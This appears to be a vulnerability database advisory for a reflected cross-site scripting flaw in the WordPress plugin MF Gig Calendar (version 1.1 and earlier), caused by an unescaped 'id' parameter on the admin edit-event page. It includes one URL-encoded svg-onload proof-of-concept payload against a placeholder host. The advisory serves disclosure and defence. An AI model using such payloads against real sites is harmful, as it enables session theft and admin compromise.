Lucene search

K
wpexploitIohexWPEX-ID:715721B0-13A1-413A-864D-2380F38ECD39
HistoryAug 17, 2021 - 12:00 a.m.

MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)

2021-08-1700:00:00
iohex
295

0.001 Low

EPSS

Percentile

47.7%

The plugin does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue

https://example.comwp-admin/admin.php?page=mf_gig_calendar&action=edit&id=%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3B%3E%3C%22

0.001 Low

EPSS

Percentile

47.7%

Related for WPEX-ID:715721B0-13A1-413A-864D-2380F38ECD39